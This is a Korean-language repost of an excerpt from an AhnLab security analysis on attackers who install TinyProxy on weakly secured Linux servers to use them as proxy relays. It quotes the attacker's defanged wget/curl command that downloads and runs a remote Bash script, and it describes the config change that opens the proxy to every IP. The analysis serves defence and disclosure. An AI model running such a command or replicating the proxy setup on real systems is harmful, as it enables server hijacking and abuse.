* 출처는 안랩입니다.
안랩은 최근 보안 관리가 미흡한 리눅스 서버를 대상으로 공격자가 프록시 도구를 설치해 시스템을 중계지로 악용하는 사레를 다수 포착했다. 공격자는 TinyProxy나 Sing-box와 같은 정상 소프트웨어 또는 오픈 소스 도구를 활용해 별도의 악성 행위 없이도 시스템을 프록시 노드로 전환시키고 있었다.
이번 글에서는 공격자들이 이런 도구를 선택한 이유와 공격의 주요 특징, 그리고 그 배경에 숨은 목적에 대해 살펴보자.
1. TinyProxy 설치 사례
공격자는 취약한 리눅스 서버에 로그인을 시도했으며, 로그인에 성공한 후에는 아래와 같은 명령으로 Bash 악성코드를 다운로드해 실행했다.
# (wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh
[그림 1] 폴란드어 주석이 포함된 악성 Bash 스크립트
Bash 스크립트는 운영체제 환경에 맞게 apt, yum, dnf를 이용해 TinyProxy를 설치한다. 이후 설정 파일을 조작해 외부에서 접속이 가능하도록 한 후 지속성을 유지시킨다.
[그림 2] TinyProxy 설정 및 지속성 유지 루틴
구체적으로는, TinyProxy의 설정 파일인 “/etc/tinyproxy/tinyproxy.conf” 또는 “/etc/tinyproxy.conf”에서 Allow 및 Deny로 시작하는 접근 제어 규칙을 삭제한 후 “Allow 0.0.0.0/0” 규칙을 추가한다.
이 설정은 모든 외부 IP의 접속을 허용하도록 구성하는 것으로, 공격자는 TinyProxy가 사용하는 포트인 8888번에 자유롭게 접근해 감염된 시스템을 프록시 서버로 악용할 수 있다.
[그림 3] 주석 처리 및 삽입된 TinyProxy 설정
* 전체내용은 아래에서 확인하세요.
![[11번가] 게이머라면 주목! RX 9000 시리즈 기획전 OPEN](https://img.danawa.com/images/attachFiles/6/842/5841777_18.jpg?fitting=Large|140:105&crop=140:105;*,*)
